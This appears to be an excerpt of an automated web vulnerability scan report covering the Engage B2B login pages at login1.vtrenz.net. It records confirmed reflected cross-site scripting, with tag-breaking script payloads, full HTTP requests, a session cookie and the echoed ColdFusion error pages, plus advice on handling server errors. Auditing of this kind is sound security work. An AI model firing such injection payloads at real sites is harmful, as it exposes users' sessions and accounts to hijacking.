<font style="COLOR: white; FONT: 11pt/13pt verdana" color="white">
The following information is meant for the website developer for debugging purposes.
</font>
</td>
<tr>
<tr>
<td bgcolor="#4646EE">
<font style="COLOR: white; FONT: 11pt/13pt verdana" color="white">
Error Occurred While Processing Request
</font>
</td>
</tr>
<tr>
<td>
<font style="COLOR: black; FONT: 8pt/11pt verdana">
<table width="500" cellpadding="0" cellspacing="0" border="0">
<tr>
<td id="tableProps2" align="left" valign="middle" width="500">
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
malformed Fuseaction
</h1>
</td>
</tr>
<tr>
<td id="tablePropsWidth" width="400" colspan="2">
<font style="COLOR: black; FONT: 8pt/11pt verdana">
You specified a malformed Fuseaction of '"--></style></script><script>netsparker(0x000B63)</script>. A fully qualified Fuseaction must be in the form [Circuit].[Fuseaction].
</font>
</td>
</tr>
<tr>
<td height> </td>
</tr>
<tr>
<td colspan="2">
<font style="COLOR: black; FONT: 8pt/11pt verdana">
Resources:
<ul>
<li>Enable Robust Exception Information to provide greater detail about the source of errors. In the Administrator, click Debugging & Logging > Debug Output Settings, and select the Robust Exception Information option.</li>
<li>Check the <a href='http://www.macromedia.com/go/proddoc_getdoc' target="new">ColdFusion documentation</a> to verify that you are using the correct syntax.</li>
<li>Search the <a href='http://www.macromedia.com/support/coldfusion/' target="new">Knowledge Base</a> to find a solution to your problem.</li>
</ul>
<p>
</td>
</tr>
<tr>
<td colspan="2">
<table border="0" cellpadding="0" cellspacing="0">
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Browser </td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)</td>
</tr>
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Remote Address </td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">10.120.0.37</td>
</tr>
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Referrer </td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">https://login1.vtrenz.net/index.cfm?method=cLoginModule.displayPWDRetrieval</td>
</tr>
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Date/Time </td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">08-Mar-11 06:10 AM</td>
</tr>
</table>
</td>
</tr>
</table>
</font>
</td>
</tr>
</table>
</body></html>
- /index.cfm
/index.cfm
CONFIRMED
|
Parameters
Parameter
|
Type
|
Value
|
method
|
GET
|
'"--></style></script><script>alert(0x000B7D)</script>
|
Request
GET /index.cfm?method='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000B7D)%3C/script%3E HTTP/1.1
Referer: https://login1.vtrenz.net/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: login1.vtrenz.net
Cookie: JSESSIONID=3c301ea994f00549756f634f3220e631d502TR
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 500 Server Error
Connection: close
Date: Tue, 08 Mar 2011 11:11:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Sorry! An error has occured.</title>
<style>
.errorHeader{
font-family:Arial, Helvetica, sans-serif;
font-weight:bold;
color:#000000;
font-size:14px;
background-color:#f2f2f2;
padding:4px;
border:1px solid #cccccc;
}
.errorText{
font-family:Arial, Helvetica, sans-serif;
font-size:11px;
padding:4px;
}
.errorFooter{
font-family:Arial, Helvetica, sans-serif;
color:#999999;
font-size:11px;
background-color:#f2f2f2;
padding:2px;
border:1px solid #cccccc;
}
</style>
</head>
<body>
<table cellpadding="0" cellspacing="0" border="0" width="585" align="center">
<tr>
<td align="left" valign="middle" class="errorHeader">An Error Has Occurred.</td>
</tr>
<tr>
<td align="left" valign="middle" class="errorText">An unknown error occurred while attempting to process your request.</td>
</tr>
<tr>
<td align="left" valign="middle" class="errorText">
<br>
If you continue to recieve this error and would like further assistance, please send an email
to <a href="mailto: <!-- " ---></TD></TD></TD></TH></TH></TH></TR></TR></TR></TABLE></TABLE></TABLE></A></ABBREV></ACRONYM></ADDRESS></APPLET></AU></B></BANNER></BIG></BLINK></BLOCKQUOTE></BQ></CAPTION></CENTER></CITE></CODE></COMMENT></DEL></DFN></DIR></DIV></DL></EM></FIG></FN></FONT></FORM></FRAME></FRAMESET></H1></H2></H3></H4></H5></H6></HEAD></I></INS></KBD></LISTING></MAP></MARQUEE></MENU></MULTICOL></NOBR></NOFRAMES></NOSCRIPT></NOTE></OL></P></PARAM></PERSON></PLAINTEXT></PRE></Q></S></SAMP></SCRIPT></SELECT></SMALL></STRIKE></STRONG></SUB></SUP></TABLE></TD></TEXTAREA></TH></TITLE></TR></TT></U></UL></VAR></WBR></XMP>
<font face="arial"></font>
<html>
<head>
<title>Error Occurred While Processing Request</title>
<script language="JavaScript">
function showHide(targetName) {
if( document.getElementById ) { // NS6+
target = document.getElementById(targetName);
} else if( document.all ) { // IE4+
target = document.all[targetName];
}
if( target ) {
if( target.style.display == "none" ) {
target.style.display = "inline";
} else {
target.style.display = "none";
}
}
}
</script>
</head>
<body>
<font style="COLOR: black; FONT: 16pt/18pt verdana">
The web site you are accessing has experienced an unexpected error.<br>
Please contact the website administrator.
</font>
<br><br>
<table border="1" cellpadding="3" bordercolor="#000808" bgcolor="#e7e7e7">
<tr>
<td bgcolor="#000066">
<font style="COLOR: white; FONT: 11pt/13pt verdana" color="white">
The following information is meant for the website developer for debugging purposes.
</font>
</td>
<tr>
<tr>
<td bgcolor="#4646EE">
<font style="COLOR: white; FONT: 11pt/13pt verdana" color="white">
Error Occurred While Processing Request
</font>
</td>
</tr>
<tr>
<td>
<font style="COLOR: black; FONT: 8pt/11pt verdana">
<table width="500" cellpadding="0" cellspacing="0" border="0">
<tr>
<td id="tableProps2" align="left" valign="middle" width="500">
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
malformed Fuseaction
</h1>
</td>
</tr>
<tr>
<td id="tablePropsWidth" width="400" colspan="2">
<font style="COLOR: black; FONT: 8pt/11pt verdana">
You specified a malformed Fuseaction of '"--></style></script><script>netsparker(0x000B7D)</script>. A fully qualified Fuseaction must be in the form [Circuit].[Fuseaction].
</font>
</td>
</tr>
<tr>
<td height> </td>
</tr>
<tr>
<td colspan="2">
<font style="COLOR: black; FONT: 8pt/11pt verdana">
Resources:
<ul>
<li>Enable Robust Exception Information to provide greater detail about the source of errors. In the Administrator, click Debugging & Logging > Debug Output Settings, and select the Robust Exception Information option.</li>
<li>Check the <a href='http://www.macromedia.com/go/proddoc_getdoc' target="new">ColdFusion documentation</a> to verify that you are using the correct syntax.</li>
<li>Search the <a href='http://www.macromedia.com/support/coldfusion/' target="new">Knowledge Base</a> to find a solution to your problem.</li>
</ul>
<p>
</td>
</tr>
<tr>
<td colspan="2">
<table border="0" cellpadding="0" cellspacing="0">
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Browser </td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)</td>
</tr>
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Remote Address </td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">10.120.0.37</td>
</tr>
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Referrer </td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">https://login1.vtrenz.net/</td>
</tr>
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Date/Time </td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">08-Mar-11 06:11 AM</td>
</tr>
</table>
</td>
</tr>
</table>
</font>
</td>
</tr>
</table>
</body></html>
- /index.cfm
/index.cfm
CONFIRMED
|
Parameters
Parameter
|
Type
|
Value
|
method
|
GET
|
'"--></style></script><script>alert(0x000B83)</script>
|
login
|
POST
|
3
|
submit.x
|
POST
|
0
|
submit.y
|
POST
|
0
|
Request
POST /index.cfm?method='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000B83)%3C/script%3E HTTP/1.1
Referer: https://login1.vtrenz.net/index.cfm?method=cLoginModule.displayPWDRetrieval
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: login1.vtrenz.net
Cookie: JSESSIONID=3c301ea994f00549756f634f3220e631d502TR
Content-Length: 29
Accept-Encoding: gzip, deflate
login=3&submit.x=0&submit.y=0
Response
HTTP/1.1 500 Server Error
Connection: close
Date: Tue, 08 Mar 2011 11:12:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Sorry! An error has occured.</title>
<style>
.errorHeader{
font-family:Arial, Helvetica, sans-serif;
font-weight:bold;
color:#000000;
font-size:14px;
background-color:#f2f2f2;
padding:4px;
border:1px solid #cccccc;
}
.errorText{
font-family:Arial, Helvetica, sans-serif;
font-size:11px;
padding:4px;
}
.errorFooter{
font-family:Arial, Helvetica, sans-serif;
color:#999999;
font-size:11px;
background-color:#f2f2f2;
padding:2px;
border:1px solid #cccccc;
}
</style>
</head>
<body>
<table cellpadding="0" cellspacing="0" border="0" width="585" align="center">
<tr>
<td align="left" valign="middle" class="errorHeader">An Error Has Occurred.</td>
</tr>
<tr>
<td align="left" valign="middle" class="errorText">An unknown error occurred while attempting to process your request.</td>
</tr>
<tr>
<td align="left" valign="middle" class="errorText">
<br>
If you continue to recieve this error and would like further assistance, please send an email
to <a href="mailto: <!-- " ---></TD></TD></TD></TH></TH></TH></TR></TR></TR></TABLE></TABLE></TABLE></A></ABBREV></ACRONYM></ADDRESS></APPLET></AU></B></BANNER></BIG></BLINK></BLOCKQUOTE></BQ></CAPTION></CENTER></CITE></CODE></COMMENT></DEL></DFN></DIR></DIV></DL></EM></FIG></FN></FONT></FORM></FRAME></FRAMESET></H1></H2></H3></H4></H5></H6></HEAD></I></INS></KBD></LISTING></MAP></MARQUEE></MENU></MULTICOL></NOBR></NOFRAMES></NOSCRIPT></NOTE></OL></P></PARAM></PERSON></PLAINTEXT></PRE></Q></S></SAMP></SCRIPT></SELECT></SMALL></STRIKE></STRONG></SUB></SUP></TABLE></TD></TEXTAREA></TH></TITLE></TR></TT></U></UL></VAR></WBR></XMP>
<font face="arial"></font>
<html>
<head>
<title>Error Occurred While Processing Request</title>
<script language="JavaScript">
function showHide(targetName) {
if( document.getElementById ) { // NS6+
target = document.getElementById(targetName);
} else if( document.all ) { // IE4+
target = document.all[targetName];
}
if( target ) {
if( target.style.display == "none" ) {
target.style.display = "inline";
} else {
target.style.display = "none";
}
}
}
</script>
</head>
<body>
<font style="COLOR: black; FONT: 16pt/18pt verdana">
The web site you are accessing has experienced an unexpected error.<br>
Please contact the website administrator.
</font>
<br><br>
<table border="1" cellpadding="3" bordercolor="#000808" bgcolor="#e7e7e7">
<tr>
<td bgcolor="#000066">
<font style="COLOR: white; FONT: 11pt/13pt verdana" color="white">
The following information is meant for the website developer for debugging purposes.
</font>
</td>
<tr>
<tr>
<td bgcolor="#4646EE">
<font style="COLOR: white; FONT: 11pt/13pt verdana" color="white">
Error Occurred While Processing Request
</font>
</td>
</tr>
<tr>
<td>
<font style="COLOR: black; FONT: 8pt/11pt verdana">
<table width="500" cellpadding="0" cellspacing="0" border="0">
<tr>
<td id="tableProps2" align="left" valign="middle" width="500">
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
malformed Fuseaction
</h1>
</td>
</tr>
<tr>
<td id="tablePropsWidth" width="400" colspan="2">
<font style="COLOR: black; FONT: 8pt/11pt verdana">
You specified a malformed Fuseaction of '"--></style></script><script>netsparker(0x000B83)</script>. A fully qualified Fuseaction must be in the form [Circuit].[Fuseaction].
</font>
</td>
</tr>
<tr>
<td height> </td>
</tr>
<tr>
<td colspan="2">
<font style="COLOR: black; FONT: 8pt/11pt verdana">
Resources:
<ul>
<li>Enable Robust Exception Information to provide greater detail about the source of errors. In the Administrator, click Debugging & Logging > Debug Output Settings, and select the Robust Exception Information option.</li>
<li>Check the <a href='http://www.macromedia.com/go/proddoc_getdoc' target="new">ColdFusion documentation</a> to verify that you are using the correct syntax.</li>
<li>Search the <a href='http://www.macromedia.com/support/coldfusion/' target="new">Knowledge Base</a> to find a solution to your problem.</li>
</ul>
<p>
</td>
</tr>
<tr>
<td colspan="2">
<table border="0" cellpadding="0" cellspacing="0">
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Browser </td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)</td>
</tr>
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Remote Address </td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">10.120.0.37</td>
</tr>
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Referrer </td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">https://login1.vtrenz.net/index.cfm?method=cLoginModule.displayPWDRetrieval</td>
</tr>
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Date/Time </td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">08-Mar-11 06:12 AM</td>
</tr>
</table>
</td>
</tr>
</table>
</font>
</td>
</tr>
</table>
</body></html>
- /index.cfm
/index.cfm
CONFIRMED
|
Parameters
Parameter
|
Type
|
Value
|
method
|
GET
|
'"--></style></script><script>alert(0x000BB9)</script>
|
user
|
GET
|
3
|
ec
|
GET
|
1
|
ech
|
GET
|
6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
|
Request
GET /index.cfm?method='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000BB9)%3C/script%3E&user=3&ec=1&ech=6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B HTTP/1.1
Referer: https://login1.vtrenz.net/index.cfm?method=cLoginModule.loginUser
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: login1.vtrenz.net
Cookie: JSESSIONID=3c301ea994f00549756f634f3220e631d502TR
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 500 Server Error
Connection: close
Date: Tue, 08 Mar 2011 11:13:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Sorry! An error has occured.</title>
<style>
.errorHeader{
font-family:Arial, Helvetica, sans-serif;
font-weight:bold;
color:#000000;
font-size:14px;
background-color:#f2f2f2;
padding:4px;
border:1px solid #cccccc;
}
.errorText{
font-family:Arial, Helvetica, sans-serif;
font-size:11px;
padding:4px;
}
.errorFooter{
font-family:Arial, Helvetica, sans-serif;
color:#999999;
font-size:11px;
background-color:#f2f2f2;
padding:2px;
border:1px solid #cccccc;
}
</style>
</head>
<body>
<table cellpadding="0" cellspacing="0" border="0" width="585" align="center">
<tr>
<td align="left" valign="middle" class="errorHeader">An Error Has Occurred.</td>
</tr>
<tr>
<td align="left" valign="middle" class="errorText">An unknown error occurred while attempting to process your request.</td>
</tr>
<tr>
<td align="left" valign="middle" class="errorText">
<br>
If you continue to recieve this error and would like further assistance, please send an email
to <a href="mailto: <!-- " ---></TD></TD></TD></TH></TH></TH></TR></TR></TR></TABLE></TABLE></TABLE></A></ABBREV></ACRONYM></ADDRESS></APPLET></AU></B></BANNER></BIG></BLINK></BLOCKQUOTE></BQ></CAPTION></CENTER></CITE></CODE></COMMENT></DEL></DFN></DIR></DIV></DL></EM></FIG></FN></FONT></FORM></FRAME></FRAMESET></H1></H2></H3></H4></H5></H6></HEAD></I></INS></KBD></LISTING></MAP></MARQUEE></MENU></MULTICOL></NOBR></NOFRAMES></NOSCRIPT></NOTE></OL></P></PARAM></PERSON></PLAINTEXT></PRE></Q></S></SAMP></SCRIPT></SELECT></SMALL></STRIKE></STRONG></SUB></SUP></TABLE></TD></TEXTAREA></TH></TITLE></TR></TT></U></UL></VAR></WBR></XMP>
<font face="arial"></font>
<html>
<head>
<title>Error Occurred While Processing Request</title>
<script language="JavaScript">
function showHide(targetName) {
if( document.getElementById ) { // NS6+
target = document.getElementById(targetName);
} else if( document.all ) { // IE4+
target = document.all[targetName];
}
if( target ) {
if( target.style.display == "none" ) {
target.style.display = "inline";
} else {
target.style.display = "none";
}
}
}
</script>
</head>
<body>
<font style="COLOR: black; FONT: 16pt/18pt verdana">
The web site you are accessing has experienced an unexpected error.<br>
Please contact the website administrator.
</font>
<br><br>
<table border="1" cellpadding="3" bordercolor="#000808" bgcolor="#e7e7e7">
<tr>
<td bgcolor="#000066">
<font style="COLOR: white; FONT: 11pt/13pt verdana" color="white">
The following information is meant for the website developer for debugging purposes.
</font>
</td>
<tr>
<tr>
<td bgcolor="#4646EE">
<font style="COLOR: white; FONT: 11pt/13pt verdana" color="white">
Error Occurred While Processing Request
</font>
</td>
</tr>
<tr>
<td>
<font style="COLOR: black; FONT: 8pt/11pt verdana">
<table width="500" cellpadding="0" cellspacing="0" border="0">
<tr>
<td id="tableProps2" align="left" valign="middle" width="500">
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
malformed Fuseaction
</h1>
</td>
</tr>
<tr>
<td id="tablePropsWidth" width="400" colspan="2">
<font style="COLOR: black; FONT: 8pt/11pt verdana">
You specified a malformed Fuseaction of '"--></style></script><script>netsparker(0x000BB9)</script>. A fully qualified Fuseaction must be in the form [Circuit].[Fuseaction].
</font>
</td>
</tr>
<tr>
<td height> </td>
</tr>
<tr>
<td colspan="2">
<font style="COLOR: black; FONT: 8pt/11pt verdana">
Resources:
<ul>
<li>Enable Robust Exception Information to provide greater detail about the source of errors. In the Administrator, click Debugging & Logging > Debug Output Settings, and select the Robust Exception Information option.</li>
<li>Check the <a href='http://www.macromedia.com/go/proddoc_getdoc' target="new">ColdFusion documentation</a> to verify that you are using the correct syntax.</li>
<li>Search the <a href='http://www.macromedia.com/support/coldfusion/' target="new">Knowledge Base</a> to find a solution to your problem.</li>
</ul>
<p>
</td>
</tr>
<tr>
<td colspan="2">
<table border="0" cellpadding="0" cellspacing="0">
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Browser </td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)</td>
</tr>
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Remote Address </td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">10.120.0.37</td>
</tr>
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Referrer </td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">https://login1.vtrenz.net/index.cfm?method=cLoginModule.loginUser</td>
</tr>
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Date/Time </td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">08-Mar-11 06:13 AM</td>
</tr>
</table>
</td>
</tr>
</table>
</font>
</td>
</tr>
</table>
</body></html>
- /index.cfm/%22ns=%22alert(0x000B59)
/index.cfm/%22ns=%22alert(0x000B59)
|
Parameters
Parameter
|
Type
|
Value
|
method
|
GET
|
cLoginModule.loginUser
|
URI-BASED
|
Raw URI
|
/"ns="alert(0x000B59)
|
Request
GET /index.cfm/%22ns=%22netsparker(0x000B59) HTTP/1.1
Referer: https://login1.vtrenz.net/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: login1.vtrenz.net
Cookie: JSESSIONID=3c301ea994f00549756f634f3220e631d502TR
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Connection: close
Date: Tue, 08 Mar 2011 11:09:37 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: USERID=;Expires=Tue, 8 Mar 2011 06:09:37 EST;Domain=.vtrenz.net;Path=/;Secure;httpOnly,TIMESTAMP=;Expires=Tue, 8 Mar 2011 06:09:37 EST;Domain=.vtrenz.net;Path=/;Secure;httpOnly,AUTHKEY=;Expires=Tue, 8 Mar 2011 06:09:37 EST;Domain=.vtrenz.net;Path=/;Secure;httpOnly
Content-Encoding:
Vary: Accept-Encoding
Transfer-Encoding: chunked
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Login to Engage B2B</title>
<style type="text/css">
@import url('/library/shared/chrome/css/layout.css');
@import url('/library/shared/content/css/form.css');
@import url('/library/loginmodule/css/login.css');
</style>
<script type="text/javascript" src="/library/shared/chrome/js/prototype.js"></script>
<script type="text/javascript" src="/library/shared/chrome/js/behaviour.js"></script>
</head>
<body>
<div id="app">
<div id="container">
<div id="content">
<form action="/"ns="netsparker(0x000B59)?method=cLoginModule.loginUser" method="post" autocomplete="off">
<p class="formRow">
<label for="login" class="prompt required">Email</label>
<div class="element">
<input type="text" id="login" name="login" value="" tabindex="1" class="xxlarge bigField" />
</div>
</p>
<p class="formRow">
<label for="password" class="prompt required">Password</label>
<div class="element">
<input type="password" id="password" name="password" value="" tabindex="2" class="medium bigField" />
<a href="/"ns="netsparker(0x000B59)?method=cLoginModule.displayPWDRetrieval" class="note">Forgot Your Password?</a>
</div>
</p>
<p class="element formRow">
<input type="image" id="submit" name="submit" tabindex="3" src="/library/shared/content/grfx/form/login.gif" />
</p>
</form>
<script type="text/javascript">
document.getElementById('login').focus();
</script>
</div>
</div>
</div>
<div id="footer">
<div id="copyright">Silverpop is a registered trademark of Silverpop Systems Inc. All other trademarks are the property of their respective owners. Copyright 2011. All rights reserved.</div>
</div>
</body>
</html>
Internal Server Error
Internal Server Error
The Server responded with an HTTP status 500. This indicates that there is a server-side error. Reasons may vary. The behavior should be analysed carefully. If Netsparker is able to find a security issue in the same resource it will report this as a separate vulnerability.
Impact
The impact may vary depending on the condition. Generally this indicates poor coding practices, not enough error checking, sanitization and whitelisting. However there might be a bigger issue such as SQL Injection. If that's the case Netsparker will check for other possible issues and report them separately.
Analyse this issue and review the application code in order to handle unexpected errors, this should be a generic practice which does not disclose further information upon an error. All errors should be handled server side only.
- /index.cfm
/index.cfm
CONFIRMED
|
Request
GET /index.cfm?method=cLoginModule.loginUser HTTP/1.1
Referer: https://login1.vtrenz.net/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: login1.vtrenz.net
Cookie: JSESSIONID=3c301ea994f00549756f634f3220e631d502TR
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 500 Server Error
Connection: close
Date: Tue, 08 Mar 2011 11:06:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Sorry! An error has occured.</title>
<style>
.errorHeader{
font-family:Arial, Helvetica, sans-serif;
font-weight:bold;
color:#000000;
font-size:14px;
background-color:#f2f2f2;
padding:4px;
border:1px solid #cccccc;
}
.errorText{
font-family:Arial, Helvetica, sans-serif;
font-size:11px;
padding:4px;
}
.errorFooter{
font-family:Arial, Helvetica, sans-serif;
color:#999999;
font-size:11px;
background-color:#f2f2f2;
padding:2px;
border:1px solid #cccccc;
}
</style>
</head>
<body>
<table cellpadding="0" cellspacing="0" border="0" width="585" align="center">
<tr>
<td align="left" valign="middle" class="errorHeader">An Error Has Occurred.</td>
</tr>
<tr>
<td align="left" valign="middle" class="errorText">An unknown error occurred while attempting to process your request.</td>
</tr>
<tr>
<td align="left" valign="middle" class="errorText">
<br>
If you continue to recieve this error and would like further assistance, please send an email
to <a href="mailto: <!-- " ---></TD></TD></TD></TH></TH></TH></TR></TR></TR></TABLE></TABLE></TABLE></A></ABBREV></ACRONYM></ADDRESS></APPLET></AU></B></BANNER></BIG></BLINK></BLOCKQUOTE></BQ></CAPTION></CENTER></CITE></CODE></COMMENT></DEL></DFN></DIR></DIV></DL></EM></FIG></FN></FONT></FORM></FRAME></FRAMESET></H1></H2></H3></H4></H5></H6></HEAD></I></INS></KBD></LISTING></MAP></MARQUEE></MENU></MULTICOL></NOBR></NOFRAMES></NOSCRIPT></NOTE></OL></P></PARAM></PERSON></PLAINTEXT></PRE></Q></S></SAMP></SCRIPT></SELECT></SMALL></STRIKE></STRONG></SUB></SUP></TABLE></TD></TEXTAREA></TH></TITLE></TR></TT></U></UL></VAR></WBR></XMP>
<font face="arial"></font>
<html>
<head>
<title>Error Occurred While Processing Request</title>
<script language="JavaScript">
function showHide(targetName) {
if( document.getElementById ) { // NS6+
target = document.getElementById(targetName);
} else if( document.all ) { // IE4+
target = document.all[targetName];
}
if( target ) {
if( target.style.display == "none" ) {
target.style.display = "inline";
} else {
target.style.display = "none";
}
}
}
</script>
</head>
<body>
<font style="COLOR: black; FONT: 16pt/18pt verdana">
The web site you are accessing has experienced an unexpected error.<br>
Please contact the website administrator.
</font>
<br><br>
<table border="1" cellpadding="3" bordercolor="#000808" bgcolor="#e7e7e7">
<tr>
<td bgcolor="#000066">
<font style="COLOR: white; FONT: 11pt/13pt verdana" color="white">
The following information is meant for the website developer for debugging purposes.
</font>
</td>
<tr>
<tr>
<td bgcolor="#4646EE">
<font style="COLOR: white; FONT: 11pt/13pt verdana" color="white">
Error Occurred While Processing Request
</font>
</td>
</tr>
<tr>
<td>
<font style="COLOR: black; FONT: 8pt/11pt verdana">
<table width="500" cellpadding="0" cellspacing="0" border="0">
<tr>
<td id="tableProps2" align="left" valign="middle" width="500">
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
Element LOGIN is undefined in ATTRIBUTES.
</h1>
</td>
</tr>
<tr>
<td id="tablePropsWidth" width="400" colspan="2">
<font style="COLOR: black; FONT: 8pt/11pt verdana">
</font>
</td>
</tr>
<tr>
<td height> </td>
</tr>
<tr>
<td colspan="2">
<font style="COLOR: black; FONT: 8pt/11pt verdana">
Resources:
<ul>
<li>Enable Robust Exception Information to provide greater detail about the source of errors. In the Administrator, click Debugging & Logging > Debug Output Settings, and select the Robust Exception Information option.</li>
<li>Check the <a href='http://www.macromedia.com/go/proddoc_getdoc' target="new">ColdFusion documentation</a> to verify that you are using the correct syntax.</li>
<li>Search the <a href='http://www.macromedia.com/support/coldfusion/' target="new">Knowledge Base</a> to find a solution to your problem.</li>
</ul>
<p>
</td>
</tr>
<tr>
<td colspan="2">
<table border="0" cellpadding="0" cellspacing="0">
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Browser </td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)</td>
</tr>
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Remote Address </td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">10.120.0.37</td>
</tr>
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Referrer </td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">https://login1.vtrenz.net/</td>
</tr>
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Date/Time </td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">08-Mar-11 06:06 AM</td>
</tr>
</table>
</td>
</tr>
</table>
</font>
</td>
</tr>
</table>
</body></html>
Cookie Not Marked As HttpOnly
